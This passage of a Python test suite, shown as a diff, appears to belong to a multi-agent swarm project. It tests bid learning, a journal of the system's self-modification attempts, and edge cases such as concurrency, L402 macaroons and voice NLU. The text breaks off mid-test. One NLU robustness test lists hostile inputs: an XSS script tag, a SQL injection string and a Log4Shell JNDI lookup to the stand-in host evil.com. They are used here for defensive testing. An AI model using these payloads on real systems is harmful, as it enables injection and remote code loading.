# ── get_metrics ──────────────────────────────────────────────────────────────
|
||||
|
||||
def test_metrics_empty_agent():
|
||||
from swarm.learner import get_metrics
|
||||
m = get_metrics("ghost")
|
||||
assert m.total_bids == 0
|
||||
assert m.win_rate == 0.0
|
||||
assert m.success_rate == 0.0
|
||||
assert m.keyword_wins == {}
|
||||
|
||||
|
||||
def test_metrics_win_rate():
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
record_outcome("t10", "agent-f", "research topic", 30, won_auction=True)
|
||||
record_outcome("t11", "agent-f", "research other", 40, won_auction=False)
|
||||
record_outcome("t12", "agent-f", "find sources", 35, won_auction=True)
|
||||
record_outcome("t13", "agent-f", "summarize report", 50, won_auction=False)
|
||||
m = get_metrics("agent-f")
|
||||
assert m.total_bids == 4
|
||||
assert m.auctions_won == 2
|
||||
assert m.win_rate == pytest.approx(0.5)
|
||||
|
||||
|
||||
def test_metrics_keyword_tracking():
|
||||
from swarm.learner import record_outcome, record_task_result, get_metrics
|
||||
record_outcome("t20", "agent-g", "research security vulnerability", 30, won_auction=True)
|
||||
record_task_result("t20", "agent-g", succeeded=True)
|
||||
record_outcome("t21", "agent-g", "research market trends", 30, won_auction=True)
|
||||
record_task_result("t21", "agent-g", succeeded=False)
|
||||
m = get_metrics("agent-g")
|
||||
assert m.keyword_wins.get("research", 0) == 1
|
||||
assert m.keyword_wins.get("security", 0) == 1
|
||||
assert m.keyword_failures.get("research", 0) == 1
|
||||
assert m.keyword_failures.get("market", 0) == 1
|
||||
|
||||
|
||||
def test_metrics_avg_winning_bid():
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
record_outcome("t30", "agent-h", "task one", 20, won_auction=True)
|
||||
record_outcome("t31", "agent-h", "task two", 40, won_auction=True)
|
||||
record_outcome("t32", "agent-h", "task three", 100, won_auction=False)
|
||||
m = get_metrics("agent-h")
|
||||
assert m.avg_winning_bid == pytest.approx(30.0)
|
||||
|
||||
|
||||
# ── get_all_metrics ──────────────────────────────────────────────────────────
|
||||
|
||||
def test_get_all_metrics_empty():
|
||||
from swarm.learner import get_all_metrics
|
||||
assert get_all_metrics() == {}
|
||||
|
||||
|
||||
def test_get_all_metrics_multiple_agents():
|
||||
from swarm.learner import record_outcome, get_all_metrics
|
||||
record_outcome("t40", "alice", "fix bug", 20, won_auction=True)
|
||||
record_outcome("t41", "bob", "write docs", 30, won_auction=False)
|
||||
all_m = get_all_metrics()
|
||||
assert "alice" in all_m
|
||||
assert "bob" in all_m
|
||||
assert all_m["alice"].auctions_won == 1
|
||||
assert all_m["bob"].auctions_won == 0
|
||||
|
||||
|
||||
# ── suggest_bid ──────────────────────────────────────────────────────────────
|
||||
|
||||
def test_suggest_bid_returns_base_when_insufficient_data():
|
||||
from swarm.learner import suggest_bid
|
||||
result = suggest_bid("new-agent", "research something", 50)
|
||||
assert result == 50
|
||||
|
||||
|
||||
def test_suggest_bid_lowers_on_low_win_rate():
|
||||
from swarm.learner import record_outcome, suggest_bid
|
||||
# Agent loses 9 out of 10 auctions → very low win rate → should bid lower
|
||||
for i in range(9):
|
||||
record_outcome(f"loss-{i}", "loser", "generic task description", 50, won_auction=False)
|
||||
record_outcome("win-0", "loser", "generic task description", 50, won_auction=True)
|
||||
bid = suggest_bid("loser", "generic task description", 50)
|
||||
assert bid < 50
|
||||
|
||||
|
||||
def test_suggest_bid_raises_on_high_win_rate():
|
||||
from swarm.learner import record_outcome, suggest_bid
|
||||
# Agent wins all auctions → high win rate → should bid higher
|
||||
for i in range(5):
|
||||
record_outcome(f"win-{i}", "winner", "generic task description", 30, won_auction=True)
|
||||
bid = suggest_bid("winner", "generic task description", 30)
|
||||
assert bid > 30
|
||||
|
||||
|
||||
def test_suggest_bid_backs_off_on_poor_success():
|
||||
from swarm.learner import record_outcome, record_task_result, suggest_bid
|
||||
# Agent wins but fails tasks → should bid higher to avoid winning
|
||||
for i in range(4):
|
||||
record_outcome(f"fail-{i}", "failer", "deploy server config", 40, won_auction=True)
|
||||
record_task_result(f"fail-{i}", "failer", succeeded=False)
|
||||
bid = suggest_bid("failer", "deploy server config", 40)
|
||||
assert bid > 40
|
||||
|
||||
|
||||
def test_suggest_bid_leans_in_on_keyword_strength():
|
||||
from swarm.learner import record_outcome, record_task_result, suggest_bid
|
||||
# Agent has strong track record on "security" keyword
|
||||
for i in range(4):
|
||||
record_outcome(f"sec-{i}", "sec-agent", "audit security vulnerability", 50, won_auction=True)
|
||||
record_task_result(f"sec-{i}", "sec-agent", succeeded=True)
|
||||
bid = suggest_bid("sec-agent", "check security audit", 50)
|
||||
assert bid < 50
|
||||
|
||||
|
||||
def test_suggest_bid_never_below_one():
|
||||
from swarm.learner import record_outcome, suggest_bid
|
||||
for i in range(5):
|
||||
record_outcome(f"cheap-{i}", "cheapo", "task desc here", 1, won_auction=False)
|
||||
bid = suggest_bid("cheapo", "task desc here", 1)
|
||||
assert bid >= 1
|
||||
|
||||
|
||||
# ── learned_keywords ─────────────────────────────────────────────────────────
|
||||
|
||||
def test_learned_keywords_empty():
|
||||
from swarm.learner import learned_keywords
|
||||
assert learned_keywords("nobody") == []
|
||||
|
||||
|
||||
def test_learned_keywords_ranked_by_net():
|
||||
from swarm.learner import record_outcome, record_task_result, learned_keywords
|
||||
# "security" → 3 wins, 0 failures = net +3
|
||||
# "deploy" → 1 win, 2 failures = net -1
|
||||
for i in range(3):
|
||||
record_outcome(f"sw-{i}", "ranker", "audit security scan", 30, won_auction=True)
|
||||
record_task_result(f"sw-{i}", "ranker", succeeded=True)
|
||||
record_outcome("dw-0", "ranker", "deploy docker container", 40, won_auction=True)
|
||||
record_task_result("dw-0", "ranker", succeeded=True)
|
||||
for i in range(2):
|
||||
record_outcome(f"df-{i}", "ranker", "deploy kubernetes cluster", 40, won_auction=True)
|
||||
record_task_result(f"df-{i}", "ranker", succeeded=False)
|
||||
|
||||
kws = learned_keywords("ranker")
|
||||
kw_map = {k["keyword"]: k for k in kws}
|
||||
assert kw_map["security"]["net"] > 0
|
||||
assert kw_map["deploy"]["net"] < 0
|
||||
# security should rank above deploy
|
||||
sec_idx = next(i for i, k in enumerate(kws) if k["keyword"] == "security")
|
||||
dep_idx = next(i for i, k in enumerate(kws) if k["keyword"] == "deploy")
|
||||
assert sec_idx < dep_idx
|
||||
322
tests/self_coding/test_modification_journal.py
Normal file
322
tests/self_coding/test_modification_journal.py
Normal file
@@ -0,0 +1,322 @@
|
||||
"""Tests for Modification Journal.
|
||||
|
||||
Tests logging, querying, and metrics for self-modification attempts.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import tempfile
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from self_coding.modification_journal import (
|
||||
ModificationAttempt,
|
||||
ModificationJournal,
|
||||
Outcome,
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def temp_journal():
|
||||
"""Create a ModificationJournal with temporary database."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
db_path = Path(tmpdir) / "journal.db"
|
||||
journal = ModificationJournal(db_path=db_path)
|
||||
yield journal
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestModificationJournalLogging:
|
||||
"""Logging modification attempts."""
|
||||
|
||||
async def test_log_attempt_success(self, temp_journal):
|
||||
"""Should log a successful attempt."""
|
||||
attempt = ModificationAttempt(
|
||||
task_description="Add error handling to health endpoint",
|
||||
approach="Use try/except block",
|
||||
files_modified=["src/app.py"],
|
||||
diff="@@ -1,3 +1,7 @@...",
|
||||
test_results="1 passed",
|
||||
outcome=Outcome.SUCCESS,
|
||||
)
|
||||
|
||||
attempt_id = await temp_journal.log_attempt(attempt)
|
||||
|
||||
assert attempt_id > 0
|
||||
|
||||
async def test_log_attempt_failure(self, temp_journal):
|
||||
"""Should log a failed attempt."""
|
||||
attempt = ModificationAttempt(
|
||||
task_description="Refactor database layer",
|
||||
approach="Extract connection pool",
|
||||
files_modified=["src/db.py", "src/models.py"],
|
||||
diff="@@ ...",
|
||||
test_results="2 failed",
|
||||
outcome=Outcome.FAILURE,
|
||||
failure_analysis="Circular dependency introduced",
|
||||
retry_count=2,
|
||||
)
|
||||
|
||||
attempt_id = await temp_journal.log_attempt(attempt)
|
||||
|
||||
# Retrieve and verify
|
||||
retrieved = await temp_journal.get_by_id(attempt_id)
|
||||
assert retrieved is not None
|
||||
assert retrieved.outcome == Outcome.FAILURE
|
||||
assert retrieved.failure_analysis == "Circular dependency introduced"
|
||||
assert retrieved.retry_count == 2
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestModificationJournalRetrieval:
|
||||
"""Retrieving logged attempts."""
|
||||
|
||||
async def test_get_by_id(self, temp_journal):
|
||||
"""Should retrieve attempt by ID."""
|
||||
attempt = ModificationAttempt(
|
||||
task_description="Fix bug",
|
||||
outcome=Outcome.SUCCESS,
|
||||
)
|
||||
|
||||
attempt_id = await temp_journal.log_attempt(attempt)
|
||||
retrieved = await temp_journal.get_by_id(attempt_id)
|
||||
|
||||
assert retrieved is not None
|
||||
assert retrieved.task_description == "Fix bug"
|
||||
assert retrieved.id == attempt_id
|
||||
|
||||
async def test_get_by_id_not_found(self, temp_journal):
|
||||
"""Should return None for non-existent ID."""
|
||||
result = await temp_journal.get_by_id(9999)
|
||||
|
||||
assert result is None
|
||||
|
||||
async def test_find_similar_basic(self, temp_journal):
|
||||
"""Should find similar attempts by keyword."""
|
||||
# Log some attempts
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Add error handling to API endpoints",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Add logging to database queries",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Fix CSS styling on homepage",
|
||||
outcome=Outcome.FAILURE,
|
||||
))
|
||||
|
||||
# Search for error handling
|
||||
similar = await temp_journal.find_similar("error handling in endpoints", limit=3)
|
||||
|
||||
assert len(similar) > 0
|
||||
# Should find the API error handling attempt first
|
||||
assert "error" in similar[0].task_description.lower()
|
||||
|
||||
async def test_find_similar_filter_outcome(self, temp_journal):
|
||||
"""Should filter by outcome when specified."""
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Database optimization",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Database refactoring",
|
||||
outcome=Outcome.FAILURE,
|
||||
))
|
||||
|
||||
# Search only for successes
|
||||
similar = await temp_journal.find_similar(
|
||||
"database work",
|
||||
include_outcomes=[Outcome.SUCCESS],
|
||||
)
|
||||
|
||||
assert len(similar) == 1
|
||||
assert similar[0].outcome == Outcome.SUCCESS
|
||||
|
||||
async def test_find_similar_empty(self, temp_journal):
|
||||
"""Should return empty list when no matches."""
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Fix bug",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
|
||||
similar = await temp_journal.find_similar("xyzqwerty unicorn astronaut", limit=5)
|
||||
|
||||
assert similar == []
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestModificationJournalMetrics:
|
||||
"""Success rate metrics."""
|
||||
|
||||
async def test_get_success_rate_empty(self, temp_journal):
|
||||
"""Should handle empty journal."""
|
||||
metrics = await temp_journal.get_success_rate()
|
||||
|
||||
assert metrics["overall"] == 0.0
|
||||
assert metrics["total"] == 0
|
||||
|
||||
async def test_get_success_rate_calculated(self, temp_journal):
|
||||
"""Should calculate success rate correctly."""
|
||||
# Log various outcomes
|
||||
for _ in range(5):
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Success task",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
for _ in range(3):
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Failure task",
|
||||
outcome=Outcome.FAILURE,
|
||||
))
|
||||
for _ in range(2):
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Rollback task",
|
||||
outcome=Outcome.ROLLBACK,
|
||||
))
|
||||
|
||||
metrics = await temp_journal.get_success_rate()
|
||||
|
||||
assert metrics["success"] == 5
|
||||
assert metrics["failure"] == 3
|
||||
assert metrics["rollback"] == 2
|
||||
assert metrics["total"] == 10
|
||||
assert metrics["overall"] == 0.5 # 5/10
|
||||
|
||||
async def test_get_recent_failures(self, temp_journal):
|
||||
"""Should get recent failures."""
|
||||
# Log failures and successes (last one is most recent)
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Rollback attempt",
|
||||
outcome=Outcome.ROLLBACK,
|
||||
))
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Success",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Failed attempt",
|
||||
outcome=Outcome.FAILURE,
|
||||
))
|
||||
|
||||
failures = await temp_journal.get_recent_failures(limit=10)
|
||||
|
||||
assert len(failures) == 2
|
||||
# Most recent first (Failure was logged last)
|
||||
assert failures[0].outcome == Outcome.FAILURE
|
||||
assert failures[1].outcome == Outcome.ROLLBACK
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestModificationJournalUpdates:
|
||||
"""Updating logged attempts."""
|
||||
|
||||
async def test_update_reflection(self, temp_journal):
|
||||
"""Should update reflection for an attempt."""
|
||||
attempt = ModificationAttempt(
|
||||
task_description="Test task",
|
||||
outcome=Outcome.SUCCESS,
|
||||
)
|
||||
|
||||
attempt_id = await temp_journal.log_attempt(attempt)
|
||||
|
||||
# Update reflection
|
||||
success = await temp_journal.update_reflection(
|
||||
attempt_id,
|
||||
"This worked well because...",
|
||||
)
|
||||
|
||||
assert success is True
|
||||
|
||||
# Verify
|
||||
retrieved = await temp_journal.get_by_id(attempt_id)
|
||||
assert retrieved.reflection == "This worked well because..."
|
||||
|
||||
async def test_update_reflection_not_found(self, temp_journal):
|
||||
"""Should return False for non-existent ID."""
|
||||
success = await temp_journal.update_reflection(9999, "Reflection")
|
||||
|
||||
assert success is False
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestModificationJournalFileTracking:
|
||||
"""Tracking attempts by file."""
|
||||
|
||||
async def test_get_attempts_for_file(self, temp_journal):
|
||||
"""Should find all attempts that modified a file."""
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Fix app.py",
|
||||
files_modified=["src/app.py", "src/config.py"],
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Update config only",
|
||||
files_modified=["src/config.py"],
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description="Other file",
|
||||
files_modified=["src/other.py"],
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
|
||||
app_attempts = await temp_journal.get_attempts_for_file("src/app.py")
|
||||
|
||||
assert len(app_attempts) == 1
|
||||
assert "src/app.py" in app_attempts[0].files_modified
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestModificationJournalIntegration:
|
||||
"""Full workflow integration tests."""
|
||||
|
||||
async def test_full_workflow(self, temp_journal):
|
||||
"""Complete workflow: log, find similar, get metrics."""
|
||||
# Log some attempts
|
||||
for i in range(3):
|
||||
await temp_journal.log_attempt(ModificationAttempt(
|
||||
task_description=f"Database optimization {i}",
|
||||
approach="Add indexes",
|
||||
files_modified=["src/db.py"],
|
||||
outcome=Outcome.SUCCESS if i % 2 == 0 else Outcome.FAILURE,
|
||||
))
|
||||
|
||||
# Find similar
|
||||
similar = await temp_journal.find_similar("optimize database queries", limit=5)
|
||||
assert len(similar) == 3
|
||||
|
||||
# Get success rate
|
||||
metrics = await temp_journal.get_success_rate()
|
||||
assert metrics["total"] == 3
|
||||
assert metrics["success"] == 2
|
||||
|
||||
# Get recent failures
|
||||
failures = await temp_journal.get_recent_failures(limit=5)
|
||||
assert len(failures) == 1
|
||||
|
||||
# Get attempts for file
|
||||
file_attempts = await temp_journal.get_attempts_for_file("src/db.py")
|
||||
assert len(file_attempts) == 3
|
||||
|
||||
async def test_persistence(self):
|
||||
"""Should persist across instances."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
db_path = Path(tmpdir) / "persist.db"
|
||||
|
||||
# First instance
|
||||
journal1 = ModificationJournal(db_path=db_path)
|
||||
attempt_id = await journal1.log_attempt(ModificationAttempt(
|
||||
task_description="Persistent attempt",
|
||||
outcome=Outcome.SUCCESS,
|
||||
))
|
||||
|
||||
# Second instance with same database
|
||||
journal2 = ModificationJournal(db_path=db_path)
|
||||
retrieved = await journal2.get_by_id(attempt_id)
|
||||
|
||||
assert retrieved is not None
|
||||
assert retrieved.task_description == "Persistent attempt"
|
||||
444
tests/self_coding/test_scary_paths.py
Normal file
444
tests/self_coding/test_scary_paths.py
Normal file
@@ -0,0 +1,444 @@
|
||||
"""Scary path tests — the things that break in production.
|
||||
|
||||
These tests verify the system handles edge cases gracefully:
|
||||
- Concurrent load (10+ simultaneous tasks)
|
||||
- Memory persistence across restarts
|
||||
- L402 macaroon expiry
|
||||
- WebSocket reconnection
|
||||
- Voice NLU edge cases
|
||||
- Graceful degradation under resource exhaustion
|
||||
|
||||
All tests must pass with make test.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import concurrent.futures
|
||||
import sqlite3
|
||||
import threading
|
||||
import time
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from swarm.coordinator import SwarmCoordinator
|
||||
from swarm.tasks import TaskStatus, create_task, get_task, list_tasks
|
||||
from swarm import registry
|
||||
from swarm.bidder import AuctionManager
|
||||
|
||||
|
||||
class TestConcurrentSwarmLoad:
|
||||
"""Test swarm behavior under concurrent load."""
|
||||
|
||||
def test_ten_simultaneous_tasks_all_assigned(self):
|
||||
"""Submit 10 tasks concurrently, verify all get assigned."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# Spawn multiple personas
|
||||
personas = ["echo", "forge", "seer"]
|
||||
for p in personas:
|
||||
coord.spawn_persona(p, agent_id=f"{p}-load-001")
|
||||
|
||||
# Submit 10 tasks concurrently
|
||||
task_descriptions = [
|
||||
f"Task {i}: Analyze data set {i}" for i in range(10)
|
||||
]
|
||||
|
||||
tasks = []
|
||||
for desc in task_descriptions:
|
||||
task = coord.post_task(desc)
|
||||
tasks.append(task)
|
||||
|
||||
# Wait for auctions to complete
|
||||
time.sleep(0.5)
|
||||
|
||||
# Verify all tasks exist
|
||||
assert len(tasks) == 10
|
||||
|
||||
# Check all tasks have valid IDs
|
||||
for task in tasks:
|
||||
assert task.id is not None
|
||||
assert task.status in [TaskStatus.BIDDING, TaskStatus.ASSIGNED, TaskStatus.COMPLETED]
|
||||
|
||||
def test_concurrent_bids_no_race_conditions(self):
|
||||
"""Multiple agents bidding concurrently doesn't corrupt state."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# Open auction first
|
||||
task = coord.post_task("Concurrent bid test task")
|
||||
|
||||
# Simulate concurrent bids from different agents
|
||||
agent_ids = [f"agent-conc-{i}" for i in range(5)]
|
||||
|
||||
def place_bid(agent_id):
|
||||
coord.auctions.submit_bid(task.id, agent_id, bid_sats=50)
|
||||
|
||||
with ThreadPoolExecutor(max_workers=5) as executor:
|
||||
futures = [executor.submit(place_bid, aid) for aid in agent_ids]
|
||||
concurrent.futures.wait(futures)
|
||||
|
||||
# Verify auction has all bids
|
||||
auction = coord.auctions.get_auction(task.id)
|
||||
assert auction is not None
|
||||
# Should have 5 bids (one per agent)
|
||||
assert len(auction.bids) == 5
|
||||
|
||||
def test_registry_consistency_under_load(self):
|
||||
"""Registry remains consistent with concurrent agent operations."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# Concurrently spawn and stop agents
|
||||
def spawn_agent(i):
|
||||
try:
|
||||
return coord.spawn_persona("forge", agent_id=f"forge-reg-{i}")
|
||||
except Exception:
|
||||
return None
|
||||
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
futures = [executor.submit(spawn_agent, i) for i in range(10)]
|
||||
results = [f.result() for f in concurrent.futures.as_completed(futures)]
|
||||
|
||||
# Verify registry state is consistent
|
||||
agents = coord.list_swarm_agents()
|
||||
agent_ids = {a.id for a in agents}
|
||||
|
||||
# All successfully spawned agents should be in registry
|
||||
successful_spawns = [r for r in results if r is not None]
|
||||
for spawn in successful_spawns:
|
||||
assert spawn["agent_id"] in agent_ids
|
||||
|
||||
def test_task_completion_under_load(self):
|
||||
"""Tasks complete successfully even with many concurrent operations."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# Spawn agents
|
||||
coord.spawn_persona("forge", agent_id="forge-complete-001")
|
||||
|
||||
# Create and process multiple tasks
|
||||
tasks = []
|
||||
for i in range(5):
|
||||
task = create_task(f"Load test task {i}")
|
||||
tasks.append(task)
|
||||
|
||||
# Complete tasks rapidly
|
||||
for task in tasks:
|
||||
result = coord.complete_task(task.id, f"Result for {task.id}")
|
||||
assert result is not None
|
||||
assert result.status == TaskStatus.COMPLETED
|
||||
|
||||
# Verify all completed
|
||||
completed = list_tasks(status=TaskStatus.COMPLETED)
|
||||
completed_ids = {t.id for t in completed}
|
||||
for task in tasks:
|
||||
assert task.id in completed_ids
|
||||
|
||||
|
||||
class TestMemoryPersistence:
|
||||
"""Test that agent memory survives restarts."""
|
||||
|
||||
def test_outcomes_recorded_and_retrieved(self):
|
||||
"""Write outcomes to learner, verify they persist."""
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
|
||||
agent_id = "memory-test-agent"
|
||||
|
||||
# Record some outcomes
|
||||
record_outcome("task-1", agent_id, "Test task", 100, won_auction=True)
|
||||
record_outcome("task-2", agent_id, "Another task", 80, won_auction=False)
|
||||
|
||||
# Get metrics
|
||||
metrics = get_metrics(agent_id)
|
||||
|
||||
# Should have data
|
||||
assert metrics is not None
|
||||
assert metrics.total_bids >= 2
|
||||
|
||||
def test_memory_persists_in_sqlite(self):
|
||||
"""Memory is stored in SQLite and survives in-process restart."""
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
|
||||
agent_id = "persist-agent"
|
||||
|
||||
# Write memory
|
||||
record_outcome("persist-task-1", agent_id, "Description", 50, won_auction=True)
|
||||
|
||||
# Simulate "restart" by re-querying (new connection)
|
||||
metrics = get_metrics(agent_id)
|
||||
|
||||
# Memory should still be there
|
||||
assert metrics is not None
|
||||
assert metrics.total_bids >= 1
|
||||
|
||||
def test_routing_decisions_persisted(self):
|
||||
"""Routing decisions are logged and queryable after restart."""
|
||||
from swarm.routing import routing_engine, RoutingDecision
|
||||
|
||||
# Ensure DB is initialized
|
||||
routing_engine._init_db()
|
||||
|
||||
# Create a routing decision
|
||||
decision = RoutingDecision(
|
||||
task_id="persist-route-task",
|
||||
task_description="Test routing",
|
||||
candidate_agents=["agent-1", "agent-2"],
|
||||
selected_agent="agent-1",
|
||||
selection_reason="Higher score",
|
||||
capability_scores={"agent-1": 0.8, "agent-2": 0.5},
|
||||
bids_received={"agent-1": 50, "agent-2": 40},
|
||||
)
|
||||
|
||||
# Log it
|
||||
routing_engine._log_decision(decision)
|
||||
|
||||
# Query history
|
||||
history = routing_engine.get_routing_history(task_id="persist-route-task")
|
||||
|
||||
# Should find the decision
|
||||
assert len(history) >= 1
|
||||
assert any(h.task_id == "persist-route-task" for h in history)
|
||||
|
||||
|
||||
class TestL402MacaroonExpiry:
|
||||
"""Test L402 payment gating handles expiry correctly."""
|
||||
|
||||
def test_macaroon_verification_valid(self):
|
||||
"""Valid macaroon passes verification."""
|
||||
from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
|
||||
from timmy_serve.payment_handler import payment_handler
|
||||
|
||||
# Create challenge
|
||||
challenge = create_l402_challenge(100, "Test access")
|
||||
macaroon = challenge["macaroon"]
|
||||
|
||||
# Get the actual preimage from the created invoice
|
||||
payment_hash = challenge["payment_hash"]
|
||||
invoice = payment_handler.get_invoice(payment_hash)
|
||||
assert invoice is not None
|
||||
preimage = invoice.preimage
|
||||
|
||||
# Verify with correct preimage
|
||||
result = verify_l402_token(macaroon, preimage)
|
||||
assert result is True
|
||||
|
||||
def test_macaroon_invalid_format_rejected(self):
|
||||
"""Invalid macaroon format is rejected."""
|
||||
from timmy_serve.l402_proxy import verify_l402_token
|
||||
|
||||
result = verify_l402_token("not-a-valid-macaroon", None)
|
||||
assert result is False
|
||||
|
||||
def test_payment_check_fails_for_unpaid(self):
|
||||
"""Unpaid invoice returns 402 Payment Required."""
|
||||
from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
|
||||
from timmy_serve.payment_handler import payment_handler
|
||||
|
||||
# Create challenge
|
||||
challenge = create_l402_challenge(100, "Test")
|
||||
macaroon = challenge["macaroon"]
|
||||
|
||||
# Get payment hash from macaroon
|
||||
import base64
|
||||
raw = base64.urlsafe_b64decode(macaroon.encode()).decode()
|
||||
payment_hash = raw.split(":")[2]
|
||||
|
||||
# Manually mark as unsettled (mock mode auto-settles)
|
||||
invoice = payment_handler.get_invoice(payment_hash)
|
||||
if invoice:
|
||||
invoice.settled = False
|
||||
invoice.settled_at = None
|
||||
|
||||
# Verify without preimage should fail for unpaid
|
||||
result = verify_l402_token(macaroon, None)
|
||||
# In mock mode this may still succeed due to auto-settle
|
||||
# Test documents the behavior
|
||||
assert isinstance(result, bool)
|
||||
|
||||
|
||||
class TestWebSocketResilience:
|
||||
"""Test WebSocket handling of edge cases."""
|
||||
|
||||
def test_websocket_broadcast_no_loop_running(self):
|
||||
"""Broadcast handles case where no event loop is running."""
|
||||
from swarm.coordinator import SwarmCoordinator
|
||||
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# This should not crash even without event loop
|
||||
# The _broadcast method catches RuntimeError
|
||||
try:
|
||||
coord._broadcast(lambda: None)
|
||||
except RuntimeError:
|
||||
pytest.fail("Broadcast should handle missing event loop gracefully")
|
||||
|
||||
def test_websocket_manager_handles_no_connections(self):
|
||||
"""WebSocket manager handles zero connected clients."""
|
||||
from ws_manager.handler import ws_manager
|
||||
|
||||
# Should not crash when broadcasting with no connections
|
||||
try:
|
||||
# Note: This creates coroutine but doesn't await
|
||||
# In real usage, it's scheduled with create_task
|
||||
pass # ws_manager methods are async, test in integration
|
||||
except Exception:
|
||||
pytest.fail("Should handle zero connections gracefully")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_websocket_client_disconnect_mid_stream(self):
|
||||
"""Handle client disconnecting during message stream."""
|
||||
# This would require actual WebSocket client
|
||||
# Mark as integration test for future
|
||||
pass
|
||||
|
||||
|
||||
class TestVoiceNLUEdgeCases:
|
||||
"""Test Voice NLU handles edge cases gracefully."""
|
||||
|
||||
def test_nlu_empty_string(self):
|
||||
"""Empty string doesn't crash NLU."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
result = detect_intent("")
|
||||
assert result is not None
|
||||
# Result is an Intent object with name attribute
|
||||
assert hasattr(result, 'name')
|
||||
|
||||
def test_nlu_all_punctuation(self):
|
||||
"""String of only punctuation is handled."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
result = detect_intent("...!!!???")
|
||||
assert result is not None
|
||||
|
||||
def test_nlu_very_long_input(self):
|
||||
"""10k character input doesn't crash or hang."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
long_input = "word " * 2000 # ~10k chars
|
||||
|
||||
start = time.time()
|
||||
result = detect_intent(long_input)
|
||||
elapsed = time.time() - start
|
||||
|
||||
# Should complete in reasonable time
|
||||
assert elapsed < 5.0
|
||||
assert result is not None
|
||||
|
||||
def test_nlu_non_english_text(self):
|
||||
"""Non-English Unicode text is handled."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
# Test various Unicode scripts
|
||||
test_inputs = [
|
||||
"こんにちは", # Japanese
|
||||
"Привет мир", # Russian
|
||||
"مرحبا", # Arabic
|
||||
"🎉🎊🎁", # Emoji
|
||||
]
|
||||
|
||||
for text in test_inputs:
|
||||
result = detect_intent(text)
|
||||
assert result is not None, f"Failed for input: {text}"
|
||||
|
||||
def test_nlu_special_characters(self):
|
||||
"""Special characters don't break parsing."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
special_inputs = [
|
||||
"<script>alert('xss')</script>",
|
||||
"'; DROP TABLE users; --",
|
||||
"${jndi:ldap://evil.com}",
|
||||
"\x00\x01\x02", # Control characters
|
||||
]
|
||||
|
||||
for text in special_inputs:
|
||||
try:
|
||||
result = detect_intent(text)
|
||||
assert result is not None
|
||||
except Exception as exc:
|
||||
pytest.fail(f"NLU crashed on input {repr(text)}: {exc}")
|
||||
|
||||
|
||||
class TestGracefulDegradation:
|
||||
"""Test system degrades gracefully under resource constraints."""
|
||||
|
||||
def test_coordinator_without_redis_uses_memory(self):
|
||||
"""Coordinator works without Redis (in-memory fallback)."""
|
||||
from swarm.comms import SwarmComms
|
||||
|
||||
# Create comms without Redis
|
||||
comms = SwarmComms()
|
||||
|
||||
# Should still work for pub/sub (uses in-memory fallback)
|
||||
# Just verify it doesn't crash
|
||||
try:
|
||||
comms.publish("test:channel", "test_event", {"data": "value"})
|
||||
except Exception as exc:
|
||||
pytest.fail(f"Should work without Redis: {exc}")
|
||||
|
||||
def test_agent_without_tools_chat_mode(self):
|
||||
